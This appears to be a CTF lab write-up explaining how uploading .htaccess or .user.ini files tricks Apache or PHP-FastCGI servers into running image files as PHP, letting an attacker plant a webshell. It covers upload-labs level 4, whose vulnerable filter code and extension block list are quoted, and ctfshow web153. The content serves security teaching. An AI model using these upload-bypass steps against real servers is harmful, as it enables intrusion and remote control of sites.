1. htaccess configuration file
htaccess file is the Apache server configuration file, only the directory where the file resides work files under.
There is such a configuration under the htaccess configuration file:
AddType application/x-httpd-php .php .jpg
This configuration means that both php and jpg format files will be parsed as php files; we can add other suffixes to parse them as php files; but this is a bit cumbersome.
So there is another configuration:
SetHandler application/x-httpd-php
This configuration will parse all files in the directory as php files.
An example is listed below:
In the fourth level of uploads-labs, almost all script files are filtered out. The source code is as follows:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
We can upload the .htaccessfile, the content is:
SetHandler application/x-httpd-php
Then upload:
Next, any file uploaded to this directory will be treated as a php file. We upload a picture Trojan:
use a chopper or ant sword to connect to get a webshell
However, the .htaccess file can only be used for the Apache environment.
2. user.ini configuration file
The configuration file is also the configuration file of the directory. .user.ini is used in a wide range, not only limited to Apache server, but also applicable to Nginx server, as long as the server has fastcgi mode enabled (usually fastcgi mode is used in non-thread safe mode).
The configuration file has two configuration conditions that are extremely critical:
auto_prepend_file = <filename> // included in the header of the file
auto_append_file = <filename> // included in the end of the file (when the exit statement fails)
note:
1. These two configuration items are equivalent to the file containing require()
2. The .php file must exist in this directory
Example, ctfshow web entry web153:
1. Upload the .user.ini configuration file, the content is:
auto_prepend_file = ctf.png (含有php代码的文件)
2. Upload ctf.png, the content is a one-sentence Trojan:
3. There must be a php file in the upload directory, index.php in the upload directory of the subject, visit the php page, and use the chopper and ant sword to connect:
References: The magical use of .htaccess and .user.ini configuration files